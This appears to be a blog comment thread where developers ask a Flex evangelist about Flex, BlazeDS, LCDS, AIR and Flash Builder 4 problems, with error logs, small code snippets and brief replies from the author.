Hi Sujith,
I am stuck in my application. It gives the following error message:
[RPC Fault faultString="Attempt to begin a DataServiceTransaction when an existing transaction was already in place." faultCode="Server.Processing" faultDetail="null"]
at mx.data::ConcreteDataService/[C:\depot\DataServices\branches\lcds26_hotfixes\frameworks\projects\data\src\mx\data\ConcreteDataService.as:2556]
at mx.data::CommitResponder/fault()[C:\depot\DataServices\branches\lcds26_hotfixes\frameworks\projects\data\src\mx\data\CommitResponder.as:176]]
Please help me resolve this issue.
Thanks in advance.
Regards,
Mk
Hi Chandra,
Please have a look at the link below for the calendar; maybe it will give you some ideas. A sample application is available in Tour de Flex as well.
Regards,
Mk.
Hi Sujit,
I'm working on a Flex application where I have a datagrid as a data-entry component (I've assigned an empty ArrayCollection to this datagrid). It has about 4 columns, and I have created an item renderer for each column which, based on conditions such as "the value should not be blank" or "the value's length should not exceed 8 characters", colors the cell red (the item renderer is a custom ActionScript class which extends Label). I have a 'Save' button just below this datagrid. On click of 'Save' I want to check which cells are colored, so that if any cell in the grid is red I can stop the 'Save' logic in its click event. How can I validate this on click of 'Save'? Can you please help me? 😦 (A sketch of one approach follows.)
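Rather than inspecting renderer colors, one approach is to re-run the same conditions over the dataProvider when Save is clicked; the field name and grid id below are assumptions:

    import mx.collections.ArrayCollection;
    import mx.controls.Alert;

    private function isRowValid(row:Object):Boolean
    {
        // Mirror the conditions the item renderers use to color a cell red.
        var code:String = row.code == null ? "" : String(row.code);
        return code.length > 0 && code.length <= 8;
    }

    private function onSave():void
    {
        var rows:ArrayCollection = grid.dataProvider as ArrayCollection; // grid is assumed
        for each (var row:Object in rows)
        {
            if (!isRowValid(row))
            {
                Alert.show("Please fix the highlighted cells before saving.");
                return; // abort the save
            }
        }
        // proceed with the save logic
    }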
How do I put a value into a Boolean field?
Is it possible to use the following values?
1) "true" (or "false")
2) 0 (or 1)
The Boolean value put into the database is always 1.
Hi Giorgos,
Yes, there was a problem with my cross-domain file;
I fixed that.
Anyway, thanks for your reply.
Thanks,
Naresh
Hi Sujit,
I hope you will get enough time to respond to my query.
I am basically a Java programmer and a beginner in Flex. My problem is: I have a Java API (.jar) on the local file system, and I want to invoke methods from that API. The thing is, I don't want to create any background service or start a server on localhost. Is that possible? If so, how?
I am facing one issue and have tried a lot.
In RPC,
I am passing an ArrayCollection (an array of simple POJO objects) to Java and expecting it to arrive as an ArrayList.
While converting an element of that list to the simple POJO, I get ClassCastException: java.util.HashMap.
Could you please suggest some way to resolve this?
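This symptom usually means the ActionScript class has no [RemoteClass] alias, so BlazeDS deserializes each object as a generic ASObject (a java.util.HashMap subclass) instead of your POJO. A sketch, assuming a hypothetical Java class com.example.Product with matching public properties:

    package com.example
    {
        [RemoteClass(alias="com.example.Product")] // must match the Java class name
        [Bindable]
        public class Product
        {
            public var id:int;
            public var name:String;
        }
    }

With the alias in place, an ArrayCollection of Product instances should arrive on the Java side as a List whose elements are com.example.Product.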
Hi everyone, I would like to set up a ColdFusion Gateway to talk to my Flex app via BlazeDS, but the catch is, it’s an EXTERNAL BlazeDS server. I see there is info on integrating CF with BlazeDS by installing them on the same machine, but I specifically want ColdFusion and BlazeDS on different servers. How can this be accomplished? Thx in advance.
Sujit,
I was working on a Flex app where session management was handled by cookies. We are now trying to migrate the same application to AIR without touching the server code. How do you think I should handle session management in AIR?
Without making any changes on the server side, I thought of handling the headers for every request myself (if I could get the cookie by reading the response header, I could explicitly set it on every subsequent request), but unfortunately neither HTTPService nor RemoteObject gives me access to the headers in any way. What do you think can be done?
Thanks in advance.
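In AIR (though not in the browser plugin) URLLoader does expose headers: the HTTPStatusEvent.HTTP_RESPONSE_STATUS event carries a responseHeaders array, and request headers can be set on URLRequest. A sketch of capturing and replaying a session cookie (the URLs are assumptions); note that AIR also manages cookies automatically by default via URLRequest.manageCookies, so explicit replay may not even be necessary:

    import flash.events.HTTPStatusEvent;
    import flash.net.URLLoader;
    import flash.net.URLRequest;
    import flash.net.URLRequestHeader;

    private var sessionCookie:String;

    private function login():void
    {
        var loader:URLLoader = new URLLoader();
        loader.addEventListener(HTTPStatusEvent.HTTP_RESPONSE_STATUS, onStatus);
        loader.load(new URLRequest("http://example.com/login")); // assumed URL
    }

    private function onStatus(event:HTTPStatusEvent):void
    {
        for each (var h:URLRequestHeader in event.responseHeaders)
        {
            if (h.name.toLowerCase() == "set-cookie")
                sessionCookie = h.value; // remember the session cookie
        }
    }

    private function authorizedRequest():void
    {
        var req:URLRequest = new URLRequest("http://example.com/data"); // assumed
        req.requestHeaders.push(new URLRequestHeader("Cookie", sessionCookie));
        new URLLoader().load(req);
    }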
Hello Sujit,
If you have time, would you mind giving us a sample .FLA file of the Google Calendar project? We can't run it because an error keeps popping up. This goes for anyone on this board as well.
Thanks in advance.
Hi Sujit,
I have a challenging question over which I am banging my head. Let me put it simply:
I have an AdvancedDataGrid with a total of 6 columns. Four of them are AdvancedDataGridColumnGroups, which in turn each contain 4 AdvancedDataGrid columns. So the columns are App_name, A (a grouped column containing a1, a2, a3, a4), B (b1-b4), C (c1-c4), D (d1-d4) and Count.
I have set background colors for the 4 grouped columns A, B, C and D, using 4 different colors.
Now my requirement is to get ALTERNATING ROW COLORS for the grouped columns (i.e. for A, B, C and D) and not for App_name and Count.
For example, if I give the grouped column A a dark blue background, then the alternating row colors of that grouped column should be such that the first row of a1-a4 is DARK BLUE and the second row of the same grouped column A (a1-a4) is LIGHT BLUE.
Another requirement is that I need to give header colors only to A, B, C and D, matching their respective background colors.
Here is the sample code:
######################################### This is my AdvancedDataGrid with grouped columns (the MXML was stripped by the comment form) ##########################################
############### This is the styleFunction that I am providing to the AdvancedDataGridColumnGroup ################################

private function ADGStyle(data:Object, col:AdvancedDataGridColumnGroup):Object
{
    /* Earlier attempt, kept for reference:
    var vals:Array = [0, 2, 4, 6];
    var i:int = fullDeployDGLinux.dataProvider.getItemIndex(data);
    if (vals.indexOf(i) >= 0)
    {
        var o:Object = new Object();
        // alternatingItemColors="[0xFFE0E0, 0xE0E0FF, 0xeaf1dd, 0xe5e0ec]"
        o.backgroundColor = 0xFF0000;
        return o;
    }
    else return null; */

    if (col.headerText == "PA1")
    {
        Alert.show("rakesh");
        var rc:int = fullDeployDGLinux.rowCount;
        // Intended to color every other row; the original loop header
        // (i >= rc; i+2) never executed and is corrected here to compile.
        for (var i:int = 0; i < rc; i += 2)
            return {rowColor: 0xFF0000};
    }
    return {rowColor: 0x000000};
}

#################################################### I only provided the styleFunction for the first AdvancedDataGridColumnGroup. The ADGStyle function is not being called (tested using the Alert statement). I guess the function needs to get values from the AdvancedDataGridColumnGroup, but I don't know how to pass values to it, since a styleFunction is referenced by name and variables cannot be passed to it.
Also, the header background colors need to be changed only for the grouped columns, matching each grouped column's background color; that is also giving me trouble.
I have tried many ways but am not getting a solution; I am not sure whether my approach is correct.
I hope you can help me out with this issue.
Hi Sujit,
The Advanced Data Grid content in my previous post was stripped out by the comment form.
I am pasting the same in this comment.
######################################### This is my AdvancedData Grid with Grouped Columns ##########################################
Hi All,
I am trying to return Java collection objects to Flex from a servlet. Can anyone suggest the best way to do it?
Thanks in advance.
Dear Sujith,
I have an XML and a SWF file on the server.
I was using PHP to write to the XML file, similar to the post at
Since the xmlData I am sending is 40.0 KB and 1017 lines, I am not able to send it using the POST method. Here is the code:
service.url = "FileWriter.php";
service.useProxy = false;
service.method = "POST";
service.resultFormat = "text";
var parameters:Object = new Object();
parameters.data = xmlData.toXMLString();
service.addEventListener(ResultEvent.RESULT, writeToXMLFileHanlder);
service.addEventListener(FaultEvent.FAULT, writeToXMLFileError);
service.send(parameters);
It is working fine on the local machine but having problems when we deploy to the server.
Please help; it is very urgent.
Thanks in advance,
Ravichandran J
9886223896
Hi Sujit,
I am working in the Seam framework and I want to add Flex components to it; I have done this with Fiji components.
Now I have added a springgraph.swf file and it is working fine, but how do I fill in its data using Java calls? Can you help me please?
Regards
Devika.N
Hi,
I am trying to run an application using LCDS. When I run the application I get the error below. Could you please assist me in solving this issue?
ReferenceError: Error #1069: Property maxFrequency not found on mx.data.DataManagementConsumer and there is no default value.
Hi Sujit
I have used Flerry, by Piotr, for calling Java APIs and making a connection between Flex and Java.
Through Flerry we can call Java APIs directly.
We need Flash Builder 4 beta 2 to use Flerry.
The following is the link from where you can download the Flerry-Demo sample.
I want to debug both Flex and Java together, so I need your help if you can.
Please help me out if you can.
Waiting for your reply.
Regards
Sangita
Hi,
I am currently working on a project where we need to create widgets. Could you help us by providing websites or materials containing information about developing widgets?
Thanks,
Balaji.D
Hi,
I love Flex based RIA’s.
We all want to spread this wonderful technology, right?
I don’t understand why you Flex evangelists do not use Flex technology as your blog system. I understand that it is easier to use WordPress rather than developing your own simple blog system, but this behavior only supports the Flash/Flex haters.
Please think about that and spread the message.
Love and Light
daslicht
Hi Sujit,
I am working on Flex-PHP pagination (runtime), which fetches the data at runtime.
I am showing the first 10 records by default:
page no. 1 fetches the first 10 records by default,
and clicking page no. 2 fetches records 11 to 20 from the database using PHP.
The navigator has a next button; on click it should go to page no. 11 and show the records for that page.
My problem is that when I click the next button, the default selection moves to page no. 11 but it shows TypeError: Error #1010: A term is undefined and has no properties,
and page no. 11 appears blank.
Hi sir,
I want to implement an email application. I went through some sample code for it, but I’m confused now because most of it contains PHP code. Can we do it without using PHP in Flex? If we use PHP, how do we call it from Flex 3?
Hope you reply soon.
Advance thanks.
hello Sujith,
how can I send email from a Flex-Java application?
Hi Sujit,
I am looking for a way to log/save in a database all messages sent to a specific BlazeDS destination.
Any suggestion/idea is much appreciated.
Best Regards,
Marko Simic
Hi Sujit,
I want to apply multiple colors to a single AreaSeries.
How do I do this?
Please help.
Thanks in advance..
Pramod Ingole.
Hi Sujit,
I am currently working on BlazeDS and trying to get some data from Java to Flex.
There is a specific case where I have a User object that contains a Role object. My problem is that while I am receiving the User object, I am not receiving the Role on the Flex side; it is giving me nulls.
Please advise on what I can do about this.
Thanks.
Sujit,
Thanks for all the great info. Can you help with this:
I have used the RDS service in FlashBuilder4 to generate the services files (_Super_MyService.as, MyService.as, etc)
And it all works great when building in FB4.
But when I go to compile with command-line ant, it fails.
Because it cannot find: RemoteObjectServiceWrapper
Can you say what library or swc needs to be injected into the ant build?
(I see FB4 references: fds.swc, fiber.swc, serializers.swc)
And, equally important, how do I tell ant to use the required libs/SWCs?
Hi Sujith,
I’m using the trial version of Flash Builder 4 Premium standalone and I’m trying to integrate it with Java using WTP (I can’t manage to install it). Could you help me out by explaining how to do that?
Thank You
=]
Hi Sujith, I have a question 🙂 I have the Professional BlazeDS book by Shashank Tiwari.
I am trying to run one of the samples in the book, but I have had no success; I hope you can point me in some direction. My background is heavy Flex, so on the Java side of things I am a newbie.
First of all, I have an EnergyConsumptionDataService class that has a public method returning a List. Within the class I have a declaration like this:
List list = new ArrayList();
For some reason Eclipse does not like this (I get warnings), and this is how it is declared in the book. The warnings I get are:
ArrayList is a raw type. References to generic type ArrayList should be parameterized
&
List is a raw type. References to generic type List should be parameterized
I have imported the class with
import java.util.*; (doesn’t get rid of the warning)
and
import java.util.ArrayList; (doesn’t get rid of the warning)
The next question is: are you familiar with HSQLDB? The sample uses it but doesn’t show how to set it up for the BlazeDS example. Do you know what I need on the client/server side to make HSQLDB work?
I appreciate your thoughts on this. Thanks.
Kofi
I’m using LC ES Designer 8.2 and I have created a quote form. Once the first part of the form is completed, the user hits a submit button to email it to the customer; however, the customer could then change the quote, since it is a form. At the bottom of the form I added a section for the customer to add a PO and a date for service, and then print and email it back.
How can I protect the first part of the form so the customer does not have access to change it?
Hi Sujit,? I am a little curious to know since it shares the same IDE for actionscript Development.
Hi, I want to use some system APIs in my AIR application. How can I use them, like in a tabble application?
I would like to see a comparison of BlazeDS 3.x with 4.x; I cannot find that information anywhere. Does 4.x include client-side sync?
Hi Sujit,
I am developing a Flex-BlazeDS (Java backend) application that sits behind SSO. My actual problem is: if I try to access my Flex application through the virtual host URL, the AMF channel fails to connect; if I access it with the physical box URL, it works normally.
I tried crossdomain.xml, but in vain.
errorID = 0
faultCode = "Client.Error.MessageSend"
faultDetail = "Channel.Connect.Failed error NetConnection.Call.Failed: HTTP: Failed: url:
Yeah, being able to build the GUI in Flash and use Flex components would be nice.
Are there finally view states in Flash CS5?
Hi sujit,
I have an ArrayCollection of video files parsed from XML that I want to display in a VideoDisplay. I want to play them without user interaction (in sequence, one after the other). If the user wants, he can click whatever video he wants; that is working fine. But as soon as the player starts, it should go on playing all the videos in sequence. Right now it plays the first video and stops, so how do I set a condition to move on to the next video? Please check my code and provide a solution or guide me the right way. In my code, videoVO1 is the ArrayCollection into which I load the video files from XML. Since I hard-coded index zero it plays the first video, but if I give any other number it shows a range error.
private function resultHandler(event:ResultEvent):void
{
    var xml:XMLList = XMLList(event.result).children();
    var links:XML;
    var videoVO1:ArrayCollection = new ArrayCollection();
    for each (links in xml)
    {
        var linksVideos:XMLList = links.link;
        for (var i:int = 0; i < linksVideos.length(); i++)
        {
            videoVO1.addItem(linksVideos[i].children());
        }
    }
    // setting the source inside the loop kept restarting the first video,
    // and the playheadTime == totalTime check never fired during parsing;
    // set the source once here and advance on the video's complete event
    videoDisplay.source = 'videos/' + videoVO1[0];
}
Good Morning,
I have been working successfully with Flex Builder 3 and am now trying to migrate code to FB4. My configuration is: Windows XP + Tomcat 6 + MySQL + BlazeDS 4 + FB 4.
Issue: When I try to execute ‘Connect to Data/Service’, I get ‘Status code: 500, Reason: Internal Server Error’.
Notes:
Your “remoteobjects.RemoteServiceHandler” runs w/o problems.
I am able to run normal JSP servlets that call the DBMS w/o trouble using the JNDI emulation that Tomcat provides for managing DB pooling.
I copied the suggested RDS servlet reference to the app’s web.xml for mapping the RDSDispatchServlet.
The JNDI reference is located in my app’s context.xml.
I have tried with and without requiring a password.
Please help, I really would like to take advantage of the code generation FB4 offers.
p/s I have found no references on how to set up RDS for FB4 + Java in the Help files. But that is another issue/problem. IMHO, Adobe should provide ready-to-run examples complete with server configuration etc. I’ve already spent a lot of time googling the web trying to find the answers. Thanks to you for the examples you have provided; without them I would not have gotten this far. But I have a question: why does a programmer have to go through this process for a commercial product?
Hello again,
oops, I found it. I googled “how to configure a Remote Development Services (RDS) server Flex” and got a hit: the LCDS Adobe online Help doc.
Thanks for all your contributions; I’ll take a rain check for my next issue.
hey Sujit..
can you please explain the difference between itemEditor and itemRenderer?
Thanks
Hi Karuna,
Good to know that you found the solution 🙂 I am sorry, I didn’t get your second question; which process do you mean?
Hi hezal,
Please find the articles in the URL below
Hi Madhu,
Please try listening to the complete event (VideoEvent.COMPLETE) of VideoDisplay and then play the next video.
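A minimal sketch of that approach, assuming videoVO1 is the ArrayCollection of file names from the earlier comment and videoDisplay is an mx:VideoDisplay; everything beyond those names is an assumption:

import mx.events.VideoEvent;

private var currentIndex:int = 0;

private function startPlaylist():void
{
    videoDisplay.addEventListener(VideoEvent.COMPLETE, onVideoComplete);
    videoDisplay.source = "videos/" + videoVO1[currentIndex];
    videoDisplay.play();
}

private function onVideoComplete(event:VideoEvent):void
{
    // advance to the next file once the current one finishes playing
    currentIndex++;
    if (currentIndex < videoVO1.length)
    {
        videoDisplay.source = "videos/" + videoVO1[currentIndex];
        videoDisplay.play();
    }
}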
Hi dl,
I don’t think so.
Hi Nagendra,
Please try checking the channel URL in the services-config.xml
Hope this helps.
Hi Santosh,
I couldn’t find a comparison chart; it should be available soon. As far as I know there are lots of improvements and additions, including Spring BlazeDS integration bundled with BlazeDS and support for the data-centric development features in Flash Builder 4 🙂
No, BlazeDS 4.x doesn’t have multi-client sync; that is part of the Data Management Service, which is available in LCDS. But with Flash Builder 4 you can try client-side data management; please find details here
Hope this helps.
Hi Chetan,
Please find details here
Hope this helps.
Hi Kartik,
I think I answered this when I met you in Ahmedabad 🙂
Hi John,
I have no idea on that. Please try asking the question here
🙂
Hi Kofi,
Looks like you are using Java 1.5 or higher to compile your Java project. Those are just raw-type warnings; try parameterizing the declaration: List<Object> list = new ArrayList<Object>();
For setting up HSQLDB, try the article at this URL; otherwise install MySQL 🙂
Also try data-centric development in Flash Builder 4; connecting to back-ends is really easy. Please find details here –
Hope this helps.
thanks so much. I will look into what you have said :))))
Hi Vinicius,
Flash Builder 4 is Eclipse 3.5 based; can you make sure the plug-in you are installing is for the 3.5 version?
Hi GoldEye,
You will need all three swcs. Just adding these to your project libs folder should help.
Hope this helps.
Hi Pramod,
If you can share the code to reproduce this, we can check what might be going wrong.
Thanks.
Hey Sujit
Thank for your help.
I have one more question:
what are the differences and similarities between the 3 RPC services (RemoteObject, HTTPService, WebService)?
And which should be used when (for what purpose)?
I went through some sites but I haven’t got it yet.
Thanks
hi sujit,
thanks for your guidance, I got it. I have an Accordion (each pane a VBox with LinkButtons linking to video files); each pane has a different number of video files parsed from XML. I want the panes to change without user interaction, and the corresponding link should get highlighted as the video files play.
thanks in advance.
I’m getting this error in WebSphere Server v6.1. The servlet is not able to do its init(); I get the error:
SRVE0100E: Did not realize init() exception thrown by servlet Transaction Controller: java.lang.VerifyError: (class: javax/xml/marshal/StreamScanner method: fail(ILjava/lang/String;)V) at pc: 97
Only my setup gets this; my colleagues’ setups do not have this problem, and I have the same WAS 6.1 version and application installed. Go figure.
Anyone else run into this one?
Hi Sujith,
Can you please guide me a little in learning Flash Builder 4? What areas should I concentrate on and learn? What skills must I acquire to be an expert in Flash Builder and RIA? I am a third-year Computer Science and Engineering student.
Hi Sujit,
I am trying to access a WSDL file on the local file system by using the <mx:WebService> tag, but I get an error: faultDetail="Unable to load WSDL. If currently online, please verify the URI and/or format of the WSDL."
Please suggest a way of doing it.
Thanks in advance,
Harshi
This is how I access the WSDL file:
<mx:WebService wsdl="file:/C:/LoginService.wsdl"/>
Hi Sujit,
Thanks for your input.
Hi sujith reddy,
1. I am trying to integrate a Flash photo gallery into a Flex application, without success. Could you please help me with any reference links or source code? Is it possible? I am using Flex 3.
2. I am trying movie clip masking using a SWF in a Flex application and failing. I referred to Tour de Flex but failed. Could you help me?
Hello,
I find your blog very useful. I have a question regarding RDS on Tomcat. In the servlet mapping, CFIDE… is specified. Is there any way to use RDS without ColdFusion or LiveCycle, and to use RDS to discover the available Java classes and methods using only Tomcat and BlazeDS?
Thanks,
Colin
Hi sujith reddy,
Can you please advise me on movie clip masking in a Flex application? I referred to Tour de Flex and downloaded the source code from it; on executing the same code, the error panel shows:
unable to open ‘\Efflex\bin\Efflex.swc’
please help me, by solving this issue.
Hi Colin,
You can use RDS without ColdFusion or LCDS. It’s just a URL mapping pointing to the RDSServlet, which is also part of BlazeDS.
Sujit,
Can you give me an example please? I’m getting an error when I use the XML code snippet you provided on your blog. We have remote developers who want access to the available ‘remotable’ methods, and this would really help us! The error that I’m receiving is:
Error executing RDS command. Status Code 404, Reason: /blazeds/CFIDE/main/ide.cfm.
We don’t have that ColdFusion module; we’re not running ColdFusion. How should the RDS servlet be mapped?
Thank you for your help.
Hi Harshi,
Please try changing the URL to
Hope this helps.
Hi Subodh,
Please try articles in this URL and
Hope this helps.
Hi Colin,
Looks like the servlet mapping is not done properly. Please check if there are any errors in the web server log, and also check whether you have the flex-rds-server.jar in your web application’s lib folder; if not, please use BlazeDS 4.0 or try this article
Hope this helps.
Sujit,
Hmm. Now it works! I am using BlazeDS 4.0; I may have been pointing to the wrong context in the Flash Builder project.
There was an error that I found in the RDS servlet mapping though; something in it made the XML compiler choke. I changed the id to "rds.." and it worked. Any ideas here?
Thank you.
Sujit,
Another question: RDS looks like it’s working now, but how do I package this up in an AIR app for desktop deployment?
Thanks again,
Colin
Hi,
Flex AIR (SDK 4) has the property “alwaysInFront”. And yes, it works almost always, but when I run certain games that window hides. I think it’s because games use OpenGL/DirectX.
I am trying to make an overlay/transparent layer over games/programs but I don’t know how to solve this problem.
It should be possible, because the Procaster application from livestream.org has that feature.
Any ideas? Or help? How do I do that?
Hi Colin,
Please check the articles for details on how to configure the configuration files for an AIR application.
Regarding the error, I am not sure. Can you please share the XML snippet? I will try to reproduce it.
hi sujit,
I have a complete project with a VideoDisplay that plays .flv files with play, pause, next video and previous, but now we would like to add .swf files to it. Is there any possibility of playing a .swf file in VideoDisplay, or how can we change the project to replace the .flv files with .swf? We are parsing the data from XML. Please advise.
thanks in advance.
madhu.
hi sujit,
In VideoDisplay I just assigned the ArrayCollection of video files to the source, so can I replace the VideoDisplay with SWFLoader? Because with SWFLoader we also pass the .swf to source for it to play. Do we need to load the SWF file before playing? Some examples are like that. I didn’t find good examples of playing a list of .swf files parsed from XML; please provide me some links. I have a requirement that I must be able to click on a link in the .swf file while it is playing; unless you click on it, the file will not move. Please help.
madhu.
hey sujit,
I am trying to use the as3googlecalendarlib.
Thanks for sharing it!
But I have some errors in the Flash CS4 IDE:
GoogleCalendarVO.as line 66: Error 1047: Parameter initializer unknown or is not a compile-time constant.
GoogleCalendarVO.as line 78: Error 1047: Parameter initializer unknown or is not a compile-time constant.
GoogleCalendarEventUtil.as line 109: Warning 3594: getTime is not a recognized method of the dynamic class Date.
How can I solve the problem?
I sincerely hope that you’ll answer my post.
Best regards.
Hi Sujit,
My application uses Flex as front end and Java as back end with BlazeDS.
I have a method to get data from the DB. I get a “java.lang.NullPointerException: null” error when I request data from Flex using IE 8, but with Firefox I am not getting any exception.
What do I need to do to solve this for IE?
Thanks,
Rakesh
Hello Sujit:
How are you?
I am one of the attendees of the Flex 4 tour at Pune last month.
Thanks for such a wonderful demonstration.
I have got one problem; it would be great if you could help solve it.
I have a database with 30 lakh (3 million) records in it.
The fields are ID, Name & Mnumber (10-digit mobile number).
I want to create an autocomplete textbox which suggests numbers according to the user’s input. For example, say the user enters 98: it should show the matching entries (not all, but at least 10 records).
Again, if the user enters 982, it should show the matching records from the database.
How do I achieve this? The 30 lakh records are the main problem for me.
Please suggest.
Thanks & Regards,
Ashish
I think that I am not presenting myself correctly to the interviewer. I have searched on Google but no one gives correct answers. So can you please give answers from the interview point of view, or give me reference links for preparing for interviews? If you are OK with this, I will send the list of questions the interviewer asked me.
Thanks in advance.
Looking forward to your reply.
Hi Sujit,
You are doing a nice job; your replies help a lot of people who are working on this.
I have one problem, please help me.
I have some VBoxes and I want to move the clicked one to the top, with the rest moving around in a circle.
For example, I have 4 VBoxes: 1 2 3 4.
If I click 3, the resulting order should be 3 4 1 2.
Thanks
Veera
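A minimal sketch of one way to get that 3 4 1 2 ordering, assuming the VBoxes sit in a container with id boxHolder (a hypothetical name) and each one calls moveToTop(this) from its click handler:

import flash.display.DisplayObject;
import mx.core.UIComponent;

private function moveToTop(clicked:UIComponent):void
{
    var count:int = boxHolder.numChildren;
    var start:int = boxHolder.getChildIndex(clicked);
    // collect the children in rotated order first, then re-index them
    var ordered:Array = [];
    for (var i:int = 0; i < count; i++)
        ordered.push(boxHolder.getChildAt((start + i) % count));
    for (i = 0; i < count; i++)
        boxHolder.setChildIndex(DisplayObject(ordered[i]), i);
}

With children 1 2 3 4 and 3 clicked, start is 2, so ordered becomes [3, 4, 1, 2] and the setChildIndex pass places them in that order.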
Hi Sujith,
We are trying to load test one of our applications built on the Flex framework. While recording the scripts using WebLOAD, we get an exception saying “Cannot create class of type DSK”. Could you please let us know where we can find this class/jar file?
Here is the log information:
Apr 29, 2010 10:21:58 AM WLAmfMessage createMessageFromBuffer
FINER: ENTRY
Apr 29, 2010 10:21:58 AM com.radview.amf.WLAmfMessage createMessageFromBuffer
WARNING: Exception occurred while reading message.
at flex.messaging.io.amf.Amf3Input.readScriptObject(Amf3Input.java:430)
at flex.messaging.io.amf.Amf3Input.readObjectValue(Amf3Input.java:153)
at flex.messaging.io.amf.Amf3Input.readObject(Amf3Input.java:132)
at flex.messaging.io.amf.Amf0Input.readObjectValue(Amf0Input.java)
at com.radview.amf.WLAmfMessage.createMessageFromBuffer(WLAmfMessage.java:152)
at com.radview.amf.WLAmfMessage.(WLAmfMessage.java:76)
at com.radview.amf.WLAmfMessageNavigator.getMessageStructure(WLAmfMessageNavigator.java:155)
Apr 29, 2010 10:21:58 AM WLAmfMessage createMessageFromBuffer
Hello Sujit,
It was nice to meet you and get new information on Flash Builder 4 during the seminar at Adobe last month. 🙂
I am building an AIR application and using the updater UI, since we have iterative releases. But some of my users do not have admin privileges on their machines. The first deployment is not a problem, since I can get help from an admin to install it, but subsequent updates won’t work. Is there a way to work around this problem, or does version 4 support this? Kindly let me know your thoughts.
Thanks,
Varun
Hi,
I have a requirement to roll a single image into a half-circle shape. I searched Google but found only galleries; I just want to paste a single image onto a cup, so I thought of first moulding it and then pasting it.
Please guide me to the right links.
-madhu
Hi Sujit
I have a question regarding Flex-Java communication using RemoteObject. When do we need to define channels at runtime in an application? Sometimes it works fine without defining any channel at runtime, but sometimes not.
Thanks
Amruta
Hi Sujith
Can I use an Oracle datasource in lcds.xml? It’s giving me an error. I am using this resource property.
I am not sure about the type type=”javax.sql.DataSource”
Hi Sujit,
I want to know how I can create dynamic reports in a Flex application, just like Crystal Reports. I want to generate lists of people city-wise or course-wise; please suggest any alternative as well. I am building my application with Flex, PHP & MySQL.
Thanks
Akash
Hi Sujit,
I want to know about the ExtJS framework. I have heard that once a GUI is ready in ExtJS, we can use the same GUI with Adobe AIR. Could you please guide me on how to do this?
May 17, 2010 5:33:24 PM org.apache.tomcat.util.digester.SetPropertiesRule begin
WARNING: [SetPropertiesRule]{Server/Service/Engine/Host/Context} Setting property ‘source’ to ‘org.eclipse.jst.jee.server:VideoChat’ did not find a matching property.
May 17, 2010 5:33:24 PM org.apache.tomcat.util.digester.SetPropertiesRule begin
WARNING: [SetPropertiesRule]{Server/Service/Engine/Host/Context} Setting property ‘source’ to ‘org.eclipse.jst.jee.server:CustomerCare’ did not find a matching property.
May 17, 2010 5:33:24:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\MySQL\MySQL Server 5.1\bin;C:\Program Files\Java\jdk1.6.0_18\bin;C:\Program Files\Java\jdk1.6.0_18\bin;
May 17, 2010 5:33:24 PM org.apache.coyote.http11.Http11Protocol init
INFO: Initializing Coyote HTTP/1.1 on http-8080
May 17, 2010 5:33:24 PM org.apache.catalina.startup.Catalina load
INFO: Initialization processed in 276 ms
May 17, 2010 5:33:24 PM org.apache.catalina.core.StandardService start
INFO: Starting service Catalina
May 17, 2010 5:33:24 PM org.apache.catalina.core.StandardEngine start
INFO: Starting Servlet Engine: Apache Tomcat/6.0.20
**** MessageBrokerServlet failed to initialize due to runtime exception: Exception: flex.messaging.MessageException: An unknown exception occurred while creating an instance of type ‘cc.ClsTEST’.
at flex.messaging.util.ClassUtil.createDefaultInstance(ClassUtil.java:161)
at flex.messaging.Destination.createAdapter(Destination.java:341)
at flex.messaging.config.MessagingConfiguration.createAdapter(MessagingConfiguration.java:372)
at flex.messaging.config.MessagingConfiguration.createDestination(MessagingConfiguration.java:364)
at flex.messaging.config.MessagingConfiguration.createServices(MessagingConfiguration.java:332)
at flex.messaging.config.MessagingConfiguration.configureBroker(MessagingConfiguration.java:100)
at flex.messaging.MessageBrokerServlet.init(MessageBrokerServlet.java:129))
Caused by: flex.messaging.MessageException: Given type ‘cc.ClsTEST’ is not of expected type ‘flex.messaging.services.ServiceAdapter’.
at flex.messaging.util.ClassUtil.createDefaultInstance(ClassUtil.java:85)
… 23 more
May 17, 2010 5:33:25 PM org.apache.catalina.core.ApplicationContext log
INFO: Marking servlet MessageBrokerServlet as unavailable
May 17, 2010 5:33:25 PM org.apache.catalina.core.StandardContext loadOnStartup
SEVERE: Servlet /CustomerCare threw load() exception
javax.servlet.UnavailableException: An unknown exception occurred while creating an instance of type ‘cc.ClsTEST’.
at flex.messaging.MessageBrokerServlet.init(MessageBrokerServlet.java:170))
May 17, 2010 5:33:25 PM org.apache.coyote.http11.Http11Protocol start
INFO: Starting Coyote HTTP/1.1 on http-8080
May 17, 2010 5:33:25 PM org.apache.jk.common.ChannelSocket init
INFO: JK: ajp13 listening on /0.0.0.0:8009
May 17, 2010 5:33:25 PM org.apache.jk.server.JkMain start
INFO: Jk running ID=0 time=0/19 config=null
May 17, 2010 5:33:25 PM org.apache.catalina.startup.Catalina start
INFO: Server startup in 1255 ms
May 17, 2010 5:33:49 PM org.apache.catalina.core.StandardWrapperValve invoke
INFO: Servlet MessageBrokerServlet is currently unavailable
What should I do?
[RPC Fault faultString="Send failed" faultCode="Client.Error.MessageSend" faultDetail="Channel.Connect.Failed error NetConnection.Call.Failed: HTTP: Failed: url: ''"] Error in the code.
I checked all the XML files, but I am unable to rectify the problem.
Please tell me how to make the code run.
hi sujit,
Is there a limitation on restoring an AIR application from the system tray using native Windows calls like ShowWindow and WinMain? I have a lightweight .NET client application that is responsible for invoking the AIR application. Once done it dies, and I can then use my AIR application itself to minimize/maximize. But if I use the .NET client, I am not able to restore it using any native code. I’d appreciate your comments on this.
Thanks,
Varun
Hi Sujit,
I want to download Blaze Monster (the AIR version); can you please send me the correct link to download it?
thanks,
Manimaran.
Hi Sujit,
I am facing one weird problem which I am not able to reproduce in my dev environment, but in the QA environment Explorer crashes with the following error:
“The instruction at “0x7e1f9883” referenced memory at “0x017674e0”. The memory could not be “read”.
Click on OK to terminate the program.”
Please suggest whether this is a problem with the QA setup. They are using IE6, and in dev we are using IE8 with Flash Player 10.
Can you look at this question?
Please share your thoughts.
Created a java pojo with boolean attribute on backend .
For example like this,
public class CustomerBO {
private boolean isFunction;
public boolean isFunction() {
return isFunction;
}
public void setFunction(boolean isFunction) {
this.isFunction = isFunction;
}
public CustomerBO() {
}
}
2. Create a remote service that returns this object.
3. Using Flash Builder, connect to this service; it generates ActionScript classes (value objects & service classes).
But they do not compile; we don’t know how it generates them.
It looks like the isFunction property is translated as below; since function is a reserved word, it does not compile.
[Bindable(event="propertyChange")]
public function get function() : Boolean
{
return _internal_function;
}
